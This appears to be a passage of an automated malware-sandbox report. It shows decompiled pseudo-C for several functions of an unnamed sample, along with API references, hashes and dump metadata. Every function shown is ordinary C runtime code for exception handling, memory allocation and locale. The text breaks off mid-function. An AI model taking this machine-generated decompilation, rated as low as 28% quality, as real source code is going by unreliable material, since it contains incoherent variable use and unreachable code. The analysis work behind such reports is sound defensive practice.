                                                    • Opcode Fuzzy Hash: 1d956f980d84911c39189db9744b559c9639ae4c5f3979b073daaa510dc817e7
                                                    • Instruction Fuzzy Hash: E541B2715002189FDB26DF28CC45FEAB7F8EB49700F01495EF555DB242DB70AE448BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 66%
                                                    			E003C784D(void* __ecx, void* __edx, void* __esi, intOrPtr* _a4) {
                                                    				signed int _v8;
                                                    				void* __ebp;
                                                    				void* _t16;
                                                    				intOrPtr* _t19;
                                                    				void* _t23;
                                                    				void* _t26;
                                                    
                                                    				_t27 = __esi;
                                                    				_t25 = __edx;
                                                    				_t32 =  *((intOrPtr*)( *_a4)) - 0xe0434352;
                                                    				if( *((intOrPtr*)( *_a4)) == 0xe0434352) {
                                                    					L8:
                                                    					__eflags =  *((intOrPtr*)(E003C3F5E(_t23, _t25, _t26, __eflags) + 0x90));
                                                    					if(__eflags > 0) {
                                                    						_t16 = E003C3F5E(_t23, _t25, _t26, __eflags);
                                                    						_t9 = _t16 + 0x90;
                                                    						 *_t9 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
                                                    						__eflags =  *_t9;
                                                    					}
                                                    					goto L10;
                                                    				} else {
                                                    					__eflags = __eax - 0xe0434f4d;
                                                    					if(__eflags == 0) {
                                                    						goto L8;
                                                    					} else {
                                                    						__eflags = __eax - 0xe06d7363;
                                                    						if(__eflags != 0) {
                                                    							L10:
                                                    							__eflags = 0;
                                                    							return 0;
                                                    						} else {
                                                    							 *(E003C3F5E(__ebx, __edx, __edi, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                                                    							_push(8);
                                                    							_push(0x3cb678);
                                                    							E003C4440(_t23, _t26, __esi);
                                                    							_t19 =  *((intOrPtr*)(E003C3F5E(_t23, __edx, _t26, _t32) + 0x78));
                                                    							if(_t19 != 0) {
                                                    								_v8 = _v8 & 0x00000000;
                                                    								 *_t19();
                                                    								_v8 = 0xfffffffe;
                                                    							}
                                                    							return E003C4485(E003C5372(_t23, _t25, _t26, _t27));
                                                    						}
                                                    					}
                                                    				}
                                                    			}










                                                    APIs
                                                    • __getptd.LIBCMT ref: 003C786E
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __getptd.LIBCMT ref: 003C787F
                                                    • __getptd.LIBCMT ref: 003C788D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                    • String ID: MOC$RCC$csm
                                                    • API String ID: 803148776-2671469338
                                                    • Opcode ID: 08023554eef41aad810a177e4eb83e4040c19767ddd1b36da22133d8c48aeee6
                                                    • Instruction ID: 183ddfd97119c2109039ace7b9adc1b32f8672d198ee78c8932a80a57a0a5f57
                                                    • Opcode Fuzzy Hash: 08023554eef41aad810a177e4eb83e4040c19767ddd1b36da22133d8c48aeee6
                                                    • Instruction Fuzzy Hash: 74E012355182049FC721AB6AC04FFA832A4EF94314F5685ADE90DCB222C735ED50CB42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E003C7AFF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _t48;
                                                    				void* _t53;
                                                    				intOrPtr _t57;
                                                    				void* _t58;
                                                    				void* _t61;
                                                    
                                                    				_t61 = __eflags;
                                                    				_push(0x2c);
                                                    				_push(0x3cba68);
                                                    				E003C4440(__ebx, __edi, __esi);
                                                    				_t48 = __ecx;
                                                    				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                    				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                    				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                    				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                    				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                    				 *((intOrPtr*)(_t58 - 0x28)) = E003C76B7(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                    				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E003C3F5E(__ecx, _t53, _t55, _t61) + 0x88));
                                                    				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E003C3F5E(_t48, _t53, _t55, _t61) + 0x8c));
                                                    				 *((intOrPtr*)(E003C3F5E(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
                                                    				 *((intOrPtr*)(E003C3F5E(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                    				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                    				 *(_t58 - 4) = 1;
                                                    				 *((intOrPtr*)(_t58 - 0x1c)) = E003C775C(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                    				 *(_t58 - 4) = 0xfffffffe;
                                                    				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                    				E003C7C25(_t48, _t53, _t55, _t57, _t61);
                                                    				return E003C4485( *((intOrPtr*)(_t58 - 0x1c)));
                                                    			}









                                                    APIs
                                                    • __CreateFrameInfo.LIBCMT ref: 003C7B27
                                                      • Part of subcall function 003C76B7: __getptd.LIBCMT ref: 003C76C5
                                                      • Part of subcall function 003C76B7: __getptd.LIBCMT ref: 003C76D3
                                                    • __getptd.LIBCMT ref: 003C7B31
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __getptd.LIBCMT ref: 003C7B3F
                                                    • __getptd.LIBCMT ref: 003C7B4D
                                                    • __getptd.LIBCMT ref: 003C7B58
                                                    • _CallCatchBlock2.LIBCMT ref: 003C7B7E
                                                      • Part of subcall function 003C775C: __CallSettingFrame@12.LIBCMT ref: 003C77A8
                                                      • Part of subcall function 003C7C25: __getptd.LIBCMT ref: 003C7C34
                                                      • Part of subcall function 003C7C25: __getptd.LIBCMT ref: 003C7C42
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1602911419-0
                                                    • Opcode ID: 4deb7a749044087d008f738892dcad3b3dd41073223d3c26cc739cfdf4ac3836
                                                    • Instruction ID: 8cd0486c46936a11f7c6162e4d0c7dfd36f035b9fa434e239eb229f29b7c9c7c
                                                    • Opcode Fuzzy Hash: 4deb7a749044087d008f738892dcad3b3dd41073223d3c26cc739cfdf4ac3836
                                                    • Instruction Fuzzy Hash: E411B3B1C042099BDB11EFA5D846BEDBBB4AF08315F10846EF818EB251DB399A159F50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E003C5D96(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				signed int _t15;
                                                    				LONG* _t21;
                                                    				void* _t31;
                                                    				LONG* _t33;
                                                    				void* _t34;
                                                    				void* _t35;
                                                    
                                                    				_t35 = __eflags;
                                                    				_t29 = __edx;
                                                    				_t25 = __ebx;
                                                    				_push(0xc);
                                                    				_push(0x3cb768);
                                                    				E003C4440(__ebx, __edi, __esi);
                                                    				_t31 = E003C3F5E(__ebx, __edx, __edi, _t35);
                                                    				_t15 =  *0x3cdb20; // 0xfffffffe
                                                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                    					E003C38F2(_t25, 0xd);
                                                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                    					_t33 =  *(_t31 + 0x68);
                                                    					 *(_t34 - 0x1c) = _t33;
                                                    					__eflags = _t33 -  *0x3cda18; // 0x27615f8
                                                    					if(__eflags != 0) {
                                                    						__eflags = _t33;
                                                    						if(__eflags != 0) {
                                                    							__eflags = InterlockedDecrement(_t33);
                                                    							if(__eflags == 0) {
                                                    								__eflags = _t33 - 0x3cd5f0;
                                                    								if(__eflags != 0) {
                                                    									E003C352B(_t33);
                                                    								}
                                                    							}
                                                    						}
                                                    						_t21 =  *0x3cda18; // 0x27615f8
                                                    						 *(_t31 + 0x68) = _t21;
                                                    						_t33 =  *0x3cda18; // 0x27615f8
                                                    						 *(_t34 - 0x1c) = _t33;
                                                    						InterlockedIncrement(_t33);
                                                    					}
                                                    					 *(_t34 - 4) = 0xfffffffe;
                                                    					E003C5E31();
                                                    				} else {
                                                    					_t33 =  *(_t31 + 0x68);
                                                    				}
                                                    				_t38 = _t33;
                                                    				if(_t33 == 0) {
                                                    					_push(0x20);
                                                    					E003C2EDA(_t29, _t31, _t33, _t38);
                                                    				}
                                                    				return E003C4485(_t33);
                                                    			}

                                                    APIs
                                                    • __getptd.LIBCMT ref: 003C5DA2
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __amsg_exit.LIBCMT ref: 003C5DC2
                                                    • __lock.LIBCMT ref: 003C5DD2
                                                    • InterlockedDecrement.KERNEL32(?), ref: 003C5DEF
                                                    • _free.LIBCMT ref: 003C5E02
                                                    • InterlockedIncrement.KERNEL32(027615F8), ref: 003C5E1A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 3470314060-0
                                                    • Opcode ID: 73d728f89b17b76b44e8fda70fa871640029242eb1666176339569cbb181bce7
                                                    • Instruction ID: c260f489a9bd07ea482401bdf7f334704571d8848b17c0a59c969abb387d5bf1
                                                    • Opcode Fuzzy Hash: 73d728f89b17b76b44e8fda70fa871640029242eb1666176339569cbb181bce7
                                                    • Instruction Fuzzy Hash: 86015E36D05B21ABC717AB25980AF9DB764AF44711F16401DF400EB690CB347E81CBD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 28%
                                                    			E003C7EAC(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                    				void* __ebp;
                                                    				void* _t20;
                                                    				void* _t22;
                                                    				void* _t23;
                                                    				void* _t25;
                                                    				intOrPtr* _t26;
                                                    				void* _t27;
                                                    				void* _t28;
                                                    
                                                    				_t27 = __esi;
                                                    				_t26 = __edi;
                                                    				_t23 = __ecx;
                                                    				_t22 = __ebx;
                                                    				_t30 = _a20;
                                                    				if(_a20 != 0) {
                                                    					_push(_a20);
                                                    					_push(__ebx);
                                                    					_push(__esi);
                                                    					_push(_a4);
                                                    					E003C7E1A(__ebx, __edi, __esi, _t30);
                                                    					_t28 = _t28 + 0x10;
                                                    				}
                                                    				_t31 = _a28;
                                                    				_push(_a4);
                                                    				if(_a28 != 0) {
                                                    					_push(_a28);
                                                    				} else {
                                                    					_push(_t27);
                                                    				}
                                                    				E003C7411(_t23);
                                                    				_push( *_t26);
                                                    				_push(_a16);
                                                    				_push(_a12);
                                                    				_push(_t27);
                                                    				E003C789C(_t22, _t23, _t25, _t26, _t27, _t31);
                                                    				_push(0x100);
                                                    				_push(_a24);
                                                    				_push(_a16);
                                                    				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                                                    				_push(_a8);
                                                    				_t14 = _t22 + 0xc; // 0x6e
                                                    				_push(_t27);
                                                    				_push(_a4);
                                                    				_t20 = E003C7AFF(_t22,  *_t14, _t26, _t27, _t31);
                                                    				if(_t20 != 0) {
                                                    					E003C73D8(_t20, _t27);
                                                    					return _t20;
                                                    				}
                                                    				return _t20;
                                                    			}

                                                    APIs
                                                    • ___BuildCatchObject.LIBCMT ref: 003C7EBF
                                                      • Part of subcall function 003C7E1A: ___BuildCatchObjectHelper.LIBCMT ref: 003C7E50
                                                    • _UnwindNestedFrames.LIBCMT ref: 003C7ED6
                                                    • ___FrameUnwindToState.LIBCMT ref: 003C7EE4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                    • String ID: csm$csm
                                                    • API String ID: 2163707966-3733052814
                                                    • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                    • Instruction ID: f8f93a6e29eba3db1e2fe59bd335c21bf61c229118179d2bbd961ef766d8f0c1
                                                    • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                    • Instruction Fuzzy Hash: 5E01D236404209BBDF136F62CC46FAA7E6AEF18390F004458BD1899561D7729DA1EFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 52%
                                                    			E003C2EF8(void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                    				intOrPtr _v0;
                                                    				char* _v8;
                                                    				intOrPtr _v12;
                                                    				char _v20;
                                                    				intOrPtr _v28;
                                                    				void* _t20;
                                                    				signed int _t21;
                                                    				intOrPtr _t25;
                                                    				signed int _t27;
                                                    				void* _t33;
                                                    				void* _t34;
                                                    				void* _t35;
                                                    				signed int _t36;
                                                    				void* _t40;
                                                    				intOrPtr _t41;
                                                    				void* _t43;
                                                    				char* _t46;
                                                    				void* _t54;
                                                    				void* _t55;
                                                    				signed int _t59;
                                                    				intOrPtr* _t60;
                                                    				void* _t62;
                                                    				intOrPtr* _t64;
                                                    				intOrPtr* _t65;
                                                    				void* _t68;
                                                    
                                                    				_t62 = __esi;
                                                    				_t55 = __edi;
                                                    				while(1) {
                                                    					_t20 = E003C3403(_t54, _t55, _t62, _a4);
                                                    					if(_t20 != 0) {
                                                    						break;
                                                    					}
                                                    					_t21 = E003C3D86(_t20, _a4);
                                                    					__eflags = _t21;
                                                    					if(_t21 == 0) {
                                                    						__eflags =  *0x3cdcc0 & 0x00000001;
                                                    						if(( *0x3cdcc0 & 0x00000001) == 0) {
                                                    							 *0x3cdcc0 =  *0x3cdcc0 | 0x00000001;
                                                    							__eflags =  *0x3cdcc0;
                                                    							_push(1);
                                                    							_v8 = "bad allocation";
                                                    							E003C2710(0x3cdcb4,  &_v8);
                                                    							 *0x3cdcb4 = 0x3c91f4;
                                                    							E003C309B( *0x3cdcc0, 0x3c882e);
                                                    						}
                                                    						_t46 =  &_v20;
                                                    						E003C2826(_t46, 0x3cdcb4);
                                                    						_v20 = 0x3c91f4;
                                                    						E003C3252( &_v20, 0x3cb7e8);
                                                    						asm("int3");
                                                    						_t64 = __imp__DecodePointer;
                                                    						_t25 =  *_t64( *0x3cea74, 0x3cdcb4, 0x3c91f4, _t40, _t46, _t68);
                                                    						_t41 = _t25;
                                                    						_v28 = _t41;
                                                    						_t65 =  *_t64( *0x3cea70);
                                                    						__eflags = _t65 - _t41;
                                                    						if(_t65 < _t41) {
                                                    							L18:
                                                    							_t27 = 0;
                                                    							__eflags = 0;
                                                    						} else {
                                                    							_t59 = _t65 - _t41;
                                                    							_t11 = _t59 + 4; // 0x4
                                                    							__eflags = _t11 - 4;
                                                    							if(_t11 < 4) {
                                                    								goto L18;
                                                    							} else {
                                                    								_t43 = E003C491C(_t41);
                                                    								_t12 = _t59 + 4; // 0x4
                                                    								__eflags = _t43 - _t12;
                                                    								if(_t43 >= _t12) {
                                                    									L17:
                                                    									_t60 = __imp__EncodePointer;
                                                    									 *_t65 =  *_t60(_v0);
                                                    									 *0x3cea70 =  *_t60(_t65 + 4);
                                                    									_t27 = _v0;
                                                    								} else {
                                                    									_t33 = 0x800;
                                                    									__eflags = _t43 - 0x800;
                                                    									if(_t43 < 0x800) {
                                                    										_t33 = _t43;
                                                    									}
                                                    									_t34 = _t33 + _t43;
                                                    									__eflags = _t34 - _t43;
                                                    									if(_t34 < _t43) {
                                                    										L14:
                                                    										_t14 = _t43 + 0x10; // 0x10
                                                    										_t35 = _t14;
                                                    										__eflags = _t35 - _t43;
                                                    										if(_t35 < _t43) {
                                                    											goto L18;
                                                    										} else {
                                                    											_t36 = E003C48CE(_v12, _t35);
                                                    											__eflags = _t36;
                                                    											if(_t36 == 0) {
                                                    												goto L18;
                                                    											} else {
                                                    												goto L16;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										_t36 = E003C48CE(_v12, _t34);
                                                    										__eflags = _t36;
                                                    										if(_t36 != 0) {
                                                    											L16:
                                                    											_t65 = _t36 + (_t59 >> 2) * 4;
                                                    											__imp__EncodePointer(_t36);
                                                    											 *0x3cea74 = _t36;
                                                    											goto L17;
                                                    										} else {
                                                    											goto L14;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    						return _t27;
                                                    					} else {
                                                    						continue;
                                                    					}
                                                    					L20:
                                                    				}
                                                    				return _t20;
                                                    				goto L20;
                                                    			}

                                                    APIs
                                                    • _malloc.LIBCMT ref: 003C2F12
                                                      • Part of subcall function 003C3403: __FF_MSGBANNER.LIBCMT ref: 003C341C
                                                      • Part of subcall function 003C3403: __NMSG_WRITE.LIBCMT ref: 003C3423
                                                      • Part of subcall function 003C3403: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003C484E,00000000,00000001,00000000,?,003C387D,00000018,003CB658,0000000C,003C390D), ref: 003C3448
                                                    • std::exception::exception.LIBCMT ref: 003C2F47
                                                    • std::exception::exception.LIBCMT ref: 003C2F61
                                                    • __CxxThrowException@8.LIBCMT ref: 003C2F72
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                    • String ID: bad allocation
                                                    • API String ID: 615853336-2104205924
                                                    • Opcode ID: 0f73b3260e39076b1a1bc2a31f2be2f90f08de34af6deacc6758a7d7e1b1d705
                                                    • Instruction ID: 5bf6a31da77686a4464a22ebdaed14de920310e4461e2873a37d29a1be2f1be3
                                                    • Opcode Fuzzy Hash: 0f73b3260e39076b1a1bc2a31f2be2f90f08de34af6deacc6758a7d7e1b1d705
                                                    • Instruction Fuzzy Hash: D0F0AF3590421DAACB17EB64DC4AF9E7AB9AF40714F14442DF905EA192CFB1AF01D790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E003C664D(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                    				void* _t7;
                                                    				long _t8;
                                                    				intOrPtr* _t9;
                                                    				intOrPtr* _t12;
                                                    				long _t27;
                                                    				long _t30;
                                                    
                                                    				if(_a4 != 0) {
                                                    					_push(__esi);
                                                    					_t30 = _a8;
                                                    					__eflags = _t30;
                                                    					if(_t30 != 0) {
                                                    						_push(__edi);
                                                    						while(1) {
                                                    							__eflags = _t30 - 0xffffffe0;
                                                    							if(_t30 > 0xffffffe0) {
                                                    								break;
                                                    							}
                                                    							__eflags = _t30;
                                                    							if(_t30 == 0) {
                                                    								_t30 = _t30 + 1;
                                                    								__eflags = _t30;
                                                    							}
                                                    							_t7 = HeapReAlloc( *0x3ce8c0, 0, _a4, _t30);
                                                    							_t27 = _t7;
                                                    							__eflags = _t27;
                                                    							if(_t27 != 0) {
                                                    								L17:
                                                    								_t8 = _t27;
                                                    							} else {
                                                    								__eflags =  *0x3ce8c4 - _t7;
                                                    								if(__eflags == 0) {
                                                    									_t9 = E003C4264(__eflags);
                                                    									 *_t9 = E003C4222(GetLastError());
                                                    									goto L17;
                                                    								} else {
                                                    									__eflags = E003C3D86(_t7, _t30);
                                                    									if(__eflags == 0) {
                                                    										_t12 = E003C4264(__eflags);
                                                    										 *_t12 = E003C4222(GetLastError());
                                                    										L12:
                                                    										_t8 = 0;
                                                    										__eflags = 0;
                                                    									} else {
                                                    										continue;
                                                    									}
                                                    								}
                                                    							}
                                                    							goto L14;
                                                    						}
                                                    						E003C3D86(_t6, _t30);
                                                    						 *((intOrPtr*)(E003C4264(__eflags))) = 0xc;
                                                    						goto L12;
                                                    					} else {
                                                    						E003C352B(_a4);
                                                    						_t8 = 0;
                                                    					}
                                                    					L14:
                                                    					return _t8;
                                                    				} else {
                                                    					return E003C3403(__edx, __edi, __esi, _a8);
                                                    				}
                                                    			}

                                                    APIs
                                                    • _malloc.LIBCMT ref: 003C665B
                                                      • Part of subcall function 003C3403: __FF_MSGBANNER.LIBCMT ref: 003C341C
                                                      • Part of subcall function 003C3403: __NMSG_WRITE.LIBCMT ref: 003C3423
                                                      • Part of subcall function 003C3403: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003C484E,00000000,00000001,00000000,?,003C387D,00000018,003CB658,0000000C,003C390D), ref: 003C3448
                                                    • _free.LIBCMT ref: 003C666E
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap_free_malloc
                                                    • String ID:
                                                    • API String ID: 1020059152-0
                                                    • Opcode ID: 82613907e5d72e7b0b5fd28b8b1b8d33d5d378879fd3d62439dec284f7706e92
                                                    • Instruction ID: e73441144d45ba983c854a8264f75837574d8b732faa97fd5e033e6c40836c94
                                                    • Opcode Fuzzy Hash: 82613907e5d72e7b0b5fd28b8b1b8d33d5d378879fd3d62439dec284f7706e92
                                                    • Instruction Fuzzy Hash: 0711A332505A15ABCB232B74AC0BF593B999F413B1F22892DF945DA2A0DA319D6087A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E003C5AFA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				signed int _t12;
                                                    				void* _t28;
                                                    				intOrPtr _t29;
                                                    				void* _t30;
                                                    				void* _t31;
                                                    
                                                    				_t31 = __eflags;
                                                    				_t26 = __edi;
                                                    				_t25 = __edx;
                                                    				_t20 = __ebx;
                                                    				_push(0xc);
                                                    				_push(0x3cb748);
                                                    				E003C4440(__ebx, __edi, __esi);
                                                    				_t28 = E003C3F5E(__ebx, __edx, __edi, _t31);
                                                    				_t12 =  *0x3cdb20; // 0xfffffffe
                                                    				if(( *(_t28 + 0x70) & _t12) == 0) {
                                                    					L6:
                                                    					E003C38F2(_t20, 0xc);
                                                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                    					_t29 = _t28 + 0x6c;
                                                    					 *((intOrPtr*)(_t30 - 0x1c)) = E003C5AAD(_t29,  *0x3cd5e8);
                                                    					 *(_t30 - 4) = 0xfffffffe;
                                                    					E003C5B67();
                                                    				} else {
                                                    					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                    						goto L6;
                                                    					} else {
                                                    						_t29 =  *((intOrPtr*)(E003C3F5E(_t20, __edx, _t26, _t33) + 0x6c));
                                                    					}
                                                    				}
                                                    				_t34 = _t29;
                                                    				if(_t29 == 0) {
                                                    					_push(0x20);
                                                    					E003C2EDA(_t25, _t26, _t29, _t34);
                                                    				}
                                                    				return E003C4485(_t29);
                                                    			}

                                                    APIs
                                                    • __getptd.LIBCMT ref: 003C5B06
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __getptd.LIBCMT ref: 003C5B1D
                                                    • __amsg_exit.LIBCMT ref: 003C5B2B
                                                    • __lock.LIBCMT ref: 003C5B3B
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 003C5B4F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 9d715bfdcc7a899b0d3e4258463a9e9dd461c7584e34a8894c74d7a800f24bf1
                                                    • Instruction ID: 83d2b5e482683dbc2de9dfef7718d6a2b0c5bc36eadc48baa1636f17e78ce1cd
                                                    • Opcode Fuzzy Hash: 9d715bfdcc7a899b0d3e4258463a9e9dd461c7584e34a8894c74d7a800f24bf1
                                                    • Instruction Fuzzy Hash: 0EF09032904B109AD627BB695803F4D7AA0AF10725F12810DF458EF1C2CF747D808B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E003C14F0(void* __ebx, intOrPtr* __ecx, intOrPtr* _a4) {
                                                    				void* __esi;
                                                    				signed int _t14;
                                                    				intOrPtr _t15;
                                                    				intOrPtr* _t17;
                                                    				char* _t23;
                                                    				void* _t34;
                                                    				intOrPtr* _t36;
                                                    				intOrPtr _t41;
                                                    				signed int _t42;
